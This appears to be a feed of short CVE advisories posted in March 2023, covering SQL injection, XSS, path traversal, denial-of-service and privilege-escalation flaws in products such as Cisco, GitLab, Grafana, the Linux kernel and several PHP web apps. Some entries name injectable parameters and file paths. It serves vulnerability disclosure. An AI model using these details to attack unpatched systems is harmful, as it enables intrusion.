🚨 CVE-2023-20053A vulnerability in the web-based management interface of Cisco Nexus Dashboard could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. This vulnerability is due to insufficient user input validation. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.🎖@cveNotify |
|
| 2023-03-10 18:29:50 |
🚨 CVE-2023-20014A vulnerability in the DNS functionality of Cisco Nexus Dashboard Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition. This vulnerability is due to the improper processing of DNS requests. An attacker could exploit this vulnerability by sending a continuous stream of DNS requests to an affected device. A successful exploit could allow the attacker to cause the coredns service to stop working or cause the device to reload, resulting in a DoS condition.🎖@cveNotify |
|
| 2023-03-10 18:29:49 |
🚨 CVE-2022-23240Active IQ Unified Manager for VMware vSphere, Linux, and Microsoft Windows versions prior to 9.11P1 are susceptible to a vulnerability which allows unauthorized users to update EMS Subscriptions via unspecified vectors.🎖@cveNotify |
|
| 2023-03-10 18:29:48 |
🚨 CVE-2023-20651In apu, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07629576; Issue ID: ALPS07629576.🎖@cveNotify |
|
| 2023-03-10 18:29:44 |
🚨 CVE-2023-20649In ril, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07628607; Issue ID: ALPS07628607.🎖@cveNotify |
|
| 2023-03-10 18:29:43 |
🚨 CVE-2023-20644In ril, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07628603; Issue ID: ALPS07628603.🎖@cveNotify |
|
| 2023-03-10 18:29:42 |
🚨 CVE-2023-20647In ril, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07628547; Issue ID: ALPS07628547.🎖@cveNotify |
|
| 2023-03-10 18:29:38 |
🚨 CVE-2023-20645In ril, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07628609; Issue ID: ALPS07628609.🎖@cveNotify |
|
| 2023-03-10 18:29:37 |
🚨 CVE-2022-41722A path traversal vulnerability exists in filepath.Clean on Windows. On Windows, the filepath.Clean function could transform an invalid path such as "a/../c:/b" into the valid path "c:\b". This transformation of a relative (if invalid) path into an absolute path could enable a directory traversal attack. After fix, the filepath.Clean function transforms this path into the relative (but still invalid) path ".\c:\b".🎖@cveNotify |
|
| 2023-03-10 18:29:36 |
🚨 CVE-2022-48111A cross-site scripting (XSS) vulnerability in the check_login function of SIPE s.r.l WI400 between version 8 and 11 included allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the f parameter.🎖@cveNotify |
|
| 2023-03-10 12:29:47 |
🚨 CVE-2023-1308A vulnerability classified as critical has been found in SourceCodester Online Graduate Tracer System 1.0. Affected is an unknown function of the file admin/adminlog.php. The manipulation of the argument user leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222696.🎖@cveNotify |
|
| 2023-03-10 12:29:46 |
🚨 CVE-2023-1310A vulnerability, which was classified as critical, has been found in SourceCodester Online Graduate Tracer System 1.0. Affected by this issue is some unknown functionality of the file admin/prof.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-222698 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-10 12:29:45 |
🚨 CVE-2023-1311A vulnerability, which was classified as critical, was found in SourceCodester Friendly Island Pizza Website and Ordering System 1.0. This affects an unknown part of the file large.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222699.🎖@cveNotify |
|
| 2023-03-10 07:30:11 |
🚨 CVE-2023-1155The Cost Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the nd_cc_meta_box_cc_price_icon parameter in versions up to, and including, 1.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-03-10 07:30:10 |
🚨 CVE-2021-3854Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Glox Technology Useroam Hotspot allows SQL Injection. This issue affects Useroam Hotspot: before 5.1.0.15.🎖@cveNotify |
|
| 2023-03-10 07:30:09 |
🚨 CVE-2023-26053Gradle is a build tool with a focus on build automation and support for multi-language development. This is a collision attack on long IDs (64bits) for PGP keys. Users of dependency verification in Gradle are vulnerable if they use long IDs for PGP keys in a `trusted-key` or `pgp` element in their dependency verification metadata file. The fix is to fail dependency verification if anything but a fingerprint is used in a trust element in dependency verification metadata. The problem is fixed in Gradle 8.0 and above. The problem is also patched in Gradle 6.9.4 and 7.6.1. As a workaround, use only full fingerprint IDs for `trusted-key` or `pgp` element in the metadata is a protection against this issue.🎖@cveNotify |
|
| 2023-03-10 07:30:08 |
🚨 CVE-2023-0053SAUTER Controls Nova 200–220 Series with firmware version 3.3-006 and prior and BACnetstac version 4.2.1 and prior have only FTP and Telnet available for device management. Any sensitive information communicated through these protocols, such as credentials, is sent in cleartext. An attacker could obtain sensitive information such as user credentials to gain access to the system.🎖@cveNotify |
|
| 2023-03-10 07:30:04 |
🚨 CVE-2023-25806OpenSearch Security is a plugin for OpenSearch that offers encryption, authentication and authorization. There is an observable discrepancy in the authentication response time between calls where the user provided exists and calls where it does not. This issue only affects calls using the internal basic identity provider (IdP), and not other externally configured IdPs. Patches were released in versions 1.3.9 and 2.6.0, there are no workarounds.🎖@cveNotify |
|
| 2023-03-10 07:30:03 |
🚨 CVE-2023-20085A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script in the context of the affected interface or access sensitive, browser-based information.🎖@cveNotify |
|
| 2023-03-10 07:30:02 |
🚨 CVE-2023-27371GNU libmicrohttpd before 0.9.76 allows remote DoS (Denial of Service) due to improper parsing of a multipart/form-data boundary in the postprocessor.c MHD_create_post_processor() method. This allows an attacker to remotely send a malicious HTTP POST packet that includes one or more '\0' bytes in a multipart/form-data boundary field, which - assuming a specific heap layout - will result in an out-of-bounds read and a crash in the find_boundary() function.🎖@cveNotify |
|
| 2023-03-10 07:29:58 |
🚨 CVE-2022-41724Large handshake records may cause panics in crypto/tls. Both clients and servers may send large TLS handshake records which cause servers and clients, respectively, to panic when attempting to construct responses. This affects all TLS 1.3 clients, TLS 1.2 clients which explicitly enable session resumption (by setting Config.ClientSessionCache to a non-nil value), and TLS 1.3 servers which request client certificates (by setting Config.ClientAuth >= RequestClientCert).🎖@cveNotify |
|
| 2023-03-10 07:29:57 |
🚨 CVE-2023-0461There is a use-after-free vulnerability in the Linux Kernel which can be exploited to achieve local privilege escalation. To reach the vulnerability kernel configuration flag CONFIG_TLS or CONFIG_XFRM_ESPINTCP has to be configured, but the operation does not require any privilege. There is a use-after-free bug of icsk_ulp_data of a struct inet_connection_sock. When CONFIG_TLS is enabled, user can install a tls context (struct tls_context) on a connected tcp socket. The context is not cleared if this socket is disconnected and reused as a listener. If a new socket is created from the listener, the context is inherited and vulnerable. The setsockopt TCP_ULP operation does not require any privilege. We recommend upgrading past commit 2c02d41d71f90a5168391b6a5f2954112ba2307c🎖@cveNotify |
|
| 2023-03-10 07:29:56 |
🚨 CVE-2022-29718Caddy v2.4 was discovered to contain an open redirect vulnerability. A remote unauthenticated attacker may exploit this vulnerability to redirect users to arbitrary web URLs by tricking the victim users to click on crafted links.🎖@cveNotify |
|
| 2023-03-10 07:29:55 |
🚨 CVE-2020-5001IBM Financial Transaction Manager 3.2.0 through 3.2.7 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 192953.🎖@cveNotify |
|
| 2023-03-10 07:29:52 |
🚨 CVE-2020-5026IBM Financial Transaction Manager for Digital Payments for Multi-Platform 3.2.0 through 3.2.7 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 193662.🎖@cveNotify |
|
| 2023-03-10 07:29:51 |
🚨 CVE-2023-25544Dell NetWorker versions 19.5 and earlier contain 'Apache Tomcat' version disclosure vulnerability. A NetWorker server user with remote access to NetWorker clients may potentially exploit this vulnerability and may launch target-specific attacks.🎖@cveNotify |
|
| 2023-03-10 07:29:50 |
🚨 CVE-2023-26281IBM HTTP Server 8.5 used by IBM WebSphere Application Server could allow a remote user to cause a denial of service using a specially crafted URL. IBM X-Force ID: 248296.🎖@cveNotify |
|
| 2023-03-10 02:29:42 |
🚨 CVE-2022-41727An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.🎖@cveNotify |
|
| 2023-03-10 02:29:41 |
🚨 CVE-2023-27294Improper neutralization of input during web page generation allows an authenticated attacker with access to a restricted account to submit malicious Javascript as the description for a calendar event, which would then be executed in other users' browsers if they browse to that event. This could result in stealing session tokens from users with higher permission levels or forcing users to make actions without their knowledge.🎖@cveNotify |
|
| 2023-03-10 02:29:38 |
🚨 CVE-2023-27293Improper neutralization of input during web page generation allows an unauthenticated attacker to submit malicious Javascript as the answer to a questionnaire which would then be executed when an authenticated user reviews the candidate's submission. This could be used to steal other users’ cookies and force users to make actions without their knowledge.🎖@cveNotify |
|
| 2023-03-10 02:29:37 |
🚨 CVE-2021-34125An issue discovered in Yuneec Mantis Q and PX4-Autopilot v 1.11.3 and below allow attacker to gain access to sensitive information via various nuttx commands.🎖@cveNotify |
|
| 2023-03-10 02:29:36 |
🚨 CVE-2022-3767Missing validation in DAST analyzer affecting all versions from 1.11.0 prior to 3.0.32, allows custom request headers to be sent with every request, regardless of the host.🎖@cveNotify |
|
| 2023-03-09 23:29:57 |
🚨 CVE-2023-20049A vulnerability in the bidirectional forwarding detection (BFD) hardware offload feature of Cisco IOS XR Software for Cisco ASR 9000 Series Aggregation Services Routers, ASR 9902 Compact High-Performance Routers, and ASR 9903 Compact High-Performance Routers could allow an unauthenticated, remote attacker to cause a line card to reset, resulting in a denial of service (DoS) condition. This vulnerability is due to the incorrect handling of malformed BFD packets that are received on line cards where the BFD hardware offload feature is enabled. An attacker could exploit this vulnerability by sending a crafted IPv4 BFD packet to an affected device. A successful exploit could allow the attacker to cause line card exceptions or a hard reset, resulting in loss of traffic over that line card while the line card reloads.🎖@cveNotify |
|
| 2023-03-09 23:29:56 |
🚨 CVE-2022-3381An issue has been discovered in GitLab affecting all versions starting from 10.0 to 15.7.8, 15.8 prior to 15.8.4 and 15.9 prior to 15.9.2. A crafted URL could be used to redirect users to arbitrary sites🎖@cveNotify |
|
| 2023-03-09 23:29:55 |
🚨 CVE-2022-4289An issue has been discovered in GitLab affecting all versions starting from 15.3 before 15.7.8, versions of 15.8 before 15.8.4, and version 15.9 before 15.9.2. Google IAP details in Prometheus integration were not hidden, could be leaked from instance, group, or project settings to other users.🎖@cveNotify |
|
| 2023-03-09 23:29:54 |
🚨 CVE-2023-0223An issue has been discovered in GitLab affecting all versions starting from 15.5 before 15.7.8, all versions starting from 15.8 before 15.8.4, all versions starting from 15.9 before 15.9.2. Non-project members could retrieve release descriptions via the API, even if the release visibility is restricted to project members only in the project settings.🎖@cveNotify |
|
| 2023-03-09 23:29:50 |
🚨 CVE-2023-27202Best POS Management System 1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /kruxton/receipt.php.🎖@cveNotify |
|
| 2023-03-09 23:29:49 |
🚨 CVE-2023-27204Best POS Management System 1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /kruxton/manage_user.php.🎖@cveNotify |
|
| 2023-03-09 23:29:48 |
🚨 CVE-2023-27205Best POS Management System 1.0 was discovered to contain a SQL injection vulnerability via the month parameter at /kruxton/sales_report.php.🎖@cveNotify |
|
| 2023-03-09 23:29:44 |
🚨 CVE-2023-27206A cross-site scripting (XSS) vulnerability in /kruxton/navbar.php of Best POS Management System 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the page parameter.🎖@cveNotify |
|
| 2023-03-09 23:29:43 |
🚨 CVE-2023-27208A cross-site scripting (XSS) vulnerability in /php-opos/login.php of Online Pizza Ordering System 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the redirect parameter.🎖@cveNotify |
|
| 2023-03-09 23:29:42 |
🚨 CVE-2023-27210Online Pizza Ordering System 1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/view_order.php.🎖@cveNotify |
|
| 2023-03-09 23:29:41 |
🚨 CVE-2023-27211A cross-site scripting (XSS) vulnerability in /admin/navbar.php of Online Pizza Ordering System 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the page parameter.🎖@cveNotify |
|
| 2023-03-09 23:29:37 |
🚨 CVE-2023-27213Online Student Management System v1.0 was discovered to contain a SQL injection vulnerability via the searchdata parameter at /eduauth/student/search.php.🎖@cveNotify |
|
| 2023-03-09 23:29:36 |
🚨 CVE-2023-27483crossplane-runtime is a set of go libraries used to build Kubernetes controllers in Crossplane and its related stacks. An out of memory panic vulnerability has been discovered in affected versions. Applications that use the `Paved` type's `SetValue` method with user provided input without proper validation might use excessive amounts of memory and cause an out of memory panic. In the fieldpath package, the Paved.SetValue method sets a value on the Paved object according to the provided path, without any validation. This allows setting values in slices at any provided index, which grows the target array up to the requested index, the index is currently capped at max uint32 (4294967295) given how indexes are parsed, but that is still an unnecessarily large value. If callers are not validating paths' indexes on their own, which most probably are not going to do, given that the input is parsed directly in the SetValue method, this could allow users to consume arbitrary amounts of memory. Applications that do not use the `Paved` type's `SetValue` method are not affected. This issue has been addressed in versions 0.16.1 and 0.19.2. Users are advised to upgrade. Users unable to upgrade can parse and validate the path before passing it to the `SetValue` method of the `Paved` type, constraining the index size as deemed appropriate.🎖@cveNotify |
|
| 2023-03-09 23:29:35 |
🚨 CVE-2023-27484crossplane-runtime is a set of go libraries used to build Kubernetes controllers in Crossplane and its related stacks. In affected versions an already highly privileged user able to create or update Compositions can specify an arbitrarily high index in a patch's `ToFieldPath`, which could lead to excessive memory usage once such Composition is selected for a Composite resource. Compositions allow users to specify patches inserting elements into arrays at an arbitrary index. When a Composition is selected for a Composite Resource, patches are evaluated and if a specified index is greater than the current size of the target slice, Crossplane will grow that slice up to the specified index, which could lead to an excessive amount of memory usage and therefore the Pod being OOM-Killed. The index is already capped to the maximum value for a uint32 (4294967295) when parsed, but that is still an unnecessarily large value. This issue has been addressed in versions 1.11.2, 1.10.3, and 1.9.2. Users are advised to upgrade. Users unable to upgrade can restrict write privileges on Compositions to only admin users as a workaround.🎖@cveNotify |
|
| 2023-03-09 21:29:53 |
🚨 CVE-2023-1180A vulnerability has been found in SourceCodester Health Center Patient Record Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file hematology_print.php. The manipulation of the argument hem_id leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222331.🎖@cveNotify |
|
| 2023-03-09 21:29:52 |
🚨 CVE-2023-26486Vega is a visualization grammar, a declarative format for creating, saving, and sharing interactive visualization designs. The Vega `scale` expression function has the ability to call arbitrary functions with a single controlled argument. The scale expression function passes a user supplied argument group to getScale, which is then used as if it were an internal context. The context.scales[name].value is accessed from group and called as a function back in scale. This can be exploited to escape the Vega expression sandbox in order to execute arbitrary JavaScript. This issue has been fixed in version 5.13.1.🎖@cveNotify |
|
| 2023-03-09 21:29:51 |
🚨 CVE-2022-4317An issue has been discovered in GitLab DAST analyzer affecting all versions starting from 1.47 before 3.0.51, which sends custom request headers in redirects.🎖@cveNotify |
|
| 2023-03-09 21:29:47 |
🚨 CVE-2023-0483An issue has been discovered in GitLab affecting all versions starting from 12.1 before 15.7.8, all versions starting from 15.8 before 15.8.4, all versions starting from 15.9 before 15.9.2. It was possible for a project maintainer to extract a Datadog integration API key by modifying the site.🎖@cveNotify |
|
| 2023-03-09 21:29:46 |
🚨 CVE-2023-1287An XSL template vulnerability in ENOVIA Live Collaboration V6R2013xE allows Remote Code Execution.🎖@cveNotify |
|
| 2023-03-09 21:29:42 |
🚨 CVE-2023-1288An XML External Entity injection (XXE) vulnerability in ENOVIA Live Collaboration V6R2013xE allows Remote File inclusions.🎖@cveNotify |
|
| 2023-03-09 21:29:41 |
🚨 CVE-2022-29056A improper restriction of excessive authentication attempts vulnerability [CWE-307] in Fortinet FortiMail version 6.4.0, version 6.2.0 through 6.2.4 and before 6.0.9 allows a remote unauthenticated attacker to partially exhaust CPU and memory via sending numerous HTTP requests to the login form.🎖@cveNotify |
|
| 2023-03-09 21:29:40 |
🚨 CVE-2023-1290A vulnerability, which was classified as critical, has been found in SourceCodester Sales Tracker Management System 1.0. Affected by this issue is some unknown functionality of the file admin/clients/view_client.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222644.🎖@cveNotify |
|
| 2023-03-09 21:29:37 |
🚨 CVE-2023-1291A vulnerability, which was classified as critical, was found in SourceCodester Sales Tracker Management System 1.0. This affects an unknown part of the file admin/clients/manage_client.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-222645 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-09 21:29:36 |
🚨 CVE-2023-1293A vulnerability was found in SourceCodester Online Graduate Tracer System 1.0 and classified as critical. This issue affects the function mysqli_query of the file admin_cs.php. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222647.🎖@cveNotify |
|
| 2023-03-09 21:29:35 |
🚨 CVE-2023-26208A improper restriction of excessive authentication attempts vulnerability [CWE-307] in Fortinet FortiAuthenticator 6.4.x and before allows a remote unauthenticated attacker to partially exhaust CPU and memory via sending numerous HTTP requests to the login form.🎖@cveNotify |
|
| 2023-03-09 20:29:37 |
🚨 CVE-2023-1287An XSL template vulnerability in ENOVIA Live Collaboration V6R2013xE allows Remote Code Execution.🎖@cveNotify |
|
| 2023-03-09 20:29:36 |
🚨 CVE-2023-25573metersphere is an open source continuous testing platform. In affected versions an improper access control vulnerability exists in `/api/jmeter/download/files`, which allows any user to download any file without authentication. This issue may expose all files available to the running process. This issue has been addressed in version 1.20.20 lts and 2.7.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-03-09 14:29:52 |
🚨 CVE-2023-1286Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.5.19.🎖@cveNotify |
|
| 2023-03-09 11:29:57 |
🚨 CVE-2023-27985emacsclient-mail.desktop in Emacs 28.1 through 28.2 is vulnerable to shell command injections through a crafted mailto: URI. This is related to lack of compliance with the Desktop Entry Specification.🎖@cveNotify |
|
| 2023-03-09 11:29:56 |
🚨 CVE-2023-27986emacsclient-mail.desktop in Emacs 28.1 through 28.2 is vulnerable to Emacs Lisp code injections through a crafted mailto: URI with unescaped double-quote characters.🎖@cveNotify |
|
| 2023-03-09 11:29:55 |
🚨 CVE-2023-1251Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Akinsoft Wolvox. This issue affects Wolvox: before 8.02.03.🎖@cveNotify |
|
| 2023-03-09 07:29:59 |
🚨 CVE-2023-26110All versions of the package node-bluetooth are vulnerable to Buffer Overflow via the findSerialPortChannel method due to improper user input length validation.🎖@cveNotify |
|
| 2023-03-09 07:29:58 |
🚨 CVE-2023-26948onekeyadmin v1.3.9 was discovered to contain an arbitrary file read vulnerability via the component /admin1/file/download.🎖@cveNotify |
|
| 2023-03-09 07:29:55 |
🚨 CVE-2023-0507Grafana is an open-source platform for monitoring and observability. Starting with the 8.1 branch, Grafana had a stored XSS vulnerability affecting the core plugin GeoMap. The stored XSS vulnerability was possible due to map attributions weren't properly sanitized and allowed arbitrary JavaScript to be executed in the context of the currently authorized user of the Grafana instance. An attacker needs to have the Editor role in order to change a panel to include a map attribution containing JavaScript. This means that vertical privilege escalation is possible, where a user with Editor role can change to a known password for a user having Admin role if the user with Admin role executes malicious JavaScript viewing a dashboard. Users may upgrade to version 8.5.21, 9.2.13 and 9.3.8 to receive a fix.🎖@cveNotify |
|
| 2023-03-09 07:29:54 |
🚨 CVE-2022-45608An issue was discovered in ThingsBoard 3.4.1, allows low privileged attackers (CUSTOMER_USER) to gain escalated privileges (vertically) and become an Administrator (TENANT_ADMIN) or (SYS_ADMIN) on the web application. It is important to note that in order to accomplish this, the attacker must know the corresponding API's parameter (authority : value).🎖@cveNotify |
|
| 2023-03-09 07:29:53 |
🚨 CVE-2023-23000In the Linux kernel before 5.17, drivers/phy/tegra/xusb.c mishandles the tegra_xusb_find_port_node return value. Callers expect NULL in the error case, but an error pointer is used.🎖@cveNotify |
|
| 2023-03-09 01:30:07 |
🚨 CVE-2022-3162Users authorized to list or watch one type of namespaced custom resource cluster-wide can read custom resources of a different type in the same API group without authorization. Clusters are impacted by this vulnerability if all of the following are true: 1. There are 2+ CustomResourceDefinitions sharing the same API group 2. Users have cluster-wide list or watch authorization on one of those custom resources. 3. The same users are not authorized to read another custom resource in the same API group.🎖@cveNotify |
|
| 2023-03-09 01:30:06 |
🚨 CVE-2023-0460The YouTube Embedded 1.2 SDK binds to a service within the YouTube Main App. After binding, a remote context is created with the flags Context.CONTEXT_INCLUDE_CODE | Context.CONTEXT_IGNORE_SECURITY. This allows the client app to remotely load code from YouTube Main App by retrieving the Main App’s ClassLoader. A potential vulnerability in the binding logic used by the client SDK where the SDK ends up calling bindService() on a malicious app rather than YT Main App. This creates a vulnerability where the SDK can load the malicious app’s ClassLoader instead, allowing the malicious app to load arbitrary code into the calling app whenever the embedded SDK is invoked. In order to trigger this vulnerability, an attacker must masquerade the Youtube app and install it on a device, have a second app that uses the Embedded player and typically distribute both to the victim outside of the Play Store.🎖@cveNotify |
|
| 2023-03-09 01:30:05 |
🚨 CVE-2023-0594Grafana is an open-source platform for monitoring and observability. Starting with the 7.0 branch, Grafana had a stored XSS vulnerability in the trace view visualization. The stored XSS vulnerability was possible due the value of a span's attributes/resources were not properly sanitized and this will be rendered when the span's attributes/resources are expanded. An attacker needs to have the Editor role in order to change the value of a trace view visualization to contain JavaScript. This means that vertical privilege escalation is possible, where a user with Editor role can change to a known password for a user having Admin role if the user with Admin role executes malicious JavaScript viewing a dashboard. Users may upgrade to version 8.5.21, 9.2.13 and 9.3.8 to receive a fix.🎖@cveNotify |
|
| 2023-03-09 01:30:01 |
🚨 CVE-2023-25931Medtronic identified that the Pelvic Health clinician apps, which are installed on the Smart Programmer mobile device, have a password vulnerability that requires a security update to fix. Not updating could potentially result in unauthorized control of the clinician therapy application, which has greater control over therapy parameters than the patient app. Changes still cannot be made outside of the established therapy parameters of the programmer. For unauthorized access to occur, an individual would need physical access to the Smart Programmer.🎖@cveNotify |
|
| 2023-03-09 01:30:00 |
🚨 CVE-2018-25081** DISPUTED ** Bitwarden through 2023.2.1 offers password auto-fill within a cross-domain IFRAME element. NOTE: the vendor's position is that there have been important legitimate cross-domain configurations (e.g., an apple.com IFRAME element on the icloud.com website) and that "Auto-fill on page load" is not enabled by default.🎖@cveNotify |
|
| 2023-03-09 01:29:59 |
🚨 CVE-2023-23501The issue was addressed with improved memory handling This issue is fixed in macOS Ventura 13.2. An app may be able to disclose kernel memory..🎖@cveNotify |
|
| 2023-03-09 01:29:55 |
🚨 CVE-2023-23496The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.2, tvOS 16.3, Safari 16.3, watchOS 9.3, iOS 16.3 and iPadOS 16.3. Processing maliciously crafted web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-03-09 01:29:54 |
🚨 CVE-2023-23497A logic issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.2, macOS Monterey 12.6.3, macOS Big Sur 11.7.3. An app may be able to gain root privileges.🎖@cveNotify |
|
| 2023-03-09 01:29:53 |
🚨 CVE-2022-4007A issue has been discovered in GitLab CE/EE affecting all versions from 15.3 prior to 15.7.8, version 15.8 prior to 15.8.4, and version 15.9 prior to 15.9.2 A cross-site scripting vulnerability was found in the title field of work items that allowed attackers to perform arbitrary actions on behalf of victims at client side.🎖@cveNotify |
|
| 2023-03-09 01:29:49 |
🚨 CVE-2023-0030A use-after-free flaw was found in the Linux kernel’s nouveau driver in how a user triggers a memory overflow that causes the nvkm_vma_tail function to fail. This flaw allows a local user to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2023-03-09 01:29:48 |
🚨 CVE-2023-23498A logic issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.2, iOS 15.7.3 and iPadOS 15.7.3, iOS 16.3 and iPadOS 16.3. The quoted original message may be selected from the wrong email when forwarding an email from an Exchange account.🎖@cveNotify |
|
| 2023-03-09 01:29:47 |
🚨 CVE-2023-23499This issue was addressed by enabling hardened runtime. This issue is fixed in macOS Ventura 13.2, macOS Monterey 12.6.3, tvOS 16.3, watchOS 9.3, iOS 16.3 and iPadOS 16.3, macOS Big Sur 11.7.3. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2023-03-08 23:29:50 |
🚨 CVE-2021-33351Cross Site Scripting Vulnerability in Wyomind Help Desk Magento 2 extension v.1.3.6 and before and fixed in v.1.3.7 allows attackers to escalte privileges via a crafted payload in the ticket message field.🎖@cveNotify |
|
| 2023-03-08 23:29:49 |
🚨 CVE-2021-33352An issue in Wyomind Help Desk Magento 2 extension v.1.3.6 and before fixed in v.1.3.7 allows attacker to execute arbitrary code via a phar file upload in the ticket message field.🎖@cveNotify |
|
| 2023-03-08 23:29:46 |
🚨 CVE-2021-33353Directory Traversal vulnerability in Wyomind Help Desk Magento 2 extension v.1.3.6 and before fixed in v.1.3.7 allows attacker to execute arbitrary code via the file attachment directory setting.🎖@cveNotify |
|
| 2023-03-08 23:29:45 |
🚨 CVE-2023-24777Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/table/list.🎖@cveNotify |
|
| 2023-03-08 23:29:44 |
🚨 CVE-2023-22889SmartBear Zephyr Enterprise through 7.15.0 mishandles user-defined input during report generation. This could lead to remote code execution by unauthenticated users.🎖@cveNotify |
|
| 2023-03-08 23:29:43 |
🚨 CVE-2023-22890SmartBear Zephyr Enterprise through 7.15.0 allows unauthenticated users to upload large files, which could exhaust the local drive space, causing a denial of service condition.🎖@cveNotify |
|
| 2023-03-08 23:29:39 |
🚨 CVE-2023-22892There exists an information disclosure vulnerability in SmartBear Zephyr Enterprise through 7.15.0 that could be exploited by unauthenticated users to read arbitrary files from Zephyr instances.🎖@cveNotify |
|
| 2023-03-08 23:29:38 |
🚨 CVE-2023-24782Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/database/edit.🎖@cveNotify |
|
| 2023-03-08 23:29:37 |
🚨 CVE-2023-27477wasmtime is a fast and secure runtime for WebAssembly. Wasmtime's code generation backend, Cranelift, has a bug on x86_64 platforms for the WebAssembly `i8x16.select` instruction which will produce the wrong results when the same operand is provided to the instruction and some of the selected indices are greater than 16. There is an off-by-one error in the calculation of the mask to the `pshufb` instruction which causes incorrect results to be returned if lanes are selected from the second vector. This codegen bug has been fixed in Wasmtiem 6.0.1, 5.0.1, and 4.0.1. Users are recommended to upgrade to these updated versions. If upgrading is not an option for you at this time, you can avoid this miscompilation by disabling the Wasm simd proposal. Additionally the bug is only present on x86_64 hosts. Other platforms such as AArch64 and s390x are not affected.🎖@cveNotify |
|
| 2023-03-08 22:29:52 |
🚨 CVE-2023-1276A vulnerability, which was classified as critical, has been found in SUL1SS_shop. This issue affects some unknown processing of the file application\merch\controller\Order.php. The manipulation of the argument keyword leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-222599.🎖@cveNotify |
|
| 2023-03-08 22:29:48 |
🚨 CVE-2023-1277A vulnerability, which was classified as critical, was found in kylin-system-updater up to 1.4.20kord. Affected is the function InstallSnap of the component Update Handler. The manipulation leads to command injection. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222600.🎖@cveNotify |
|
| 2023-03-08 22:29:47 |
🚨 CVE-2023-1278A vulnerability, which was classified as problematic, has been found in IBOS up to 4.5.5. Affected by this issue is some unknown functionality of the file mobil/index.php. The manipulation of the argument accesstoken leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-222608.🎖@cveNotify |
|
| 2023-03-08 22:29:46 |
🚨 CVE-2023-23760A path traversal vulnerability was identified in GitHub Enterprise Server that allowed remote code execution when building a GitHub Pages site. To exploit this vulnerability, an attacker would need permission to create and build a GitHub Pages site on the GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server prior to versions 3.8 and was fixed in versions 3.7.7, 3.6.10, 3.5.14, and 3.4.17. This vulnerability was reported via the GitHub Bug Bounty program.🎖@cveNotify |
|
| 2023-03-08 22:29:45 |
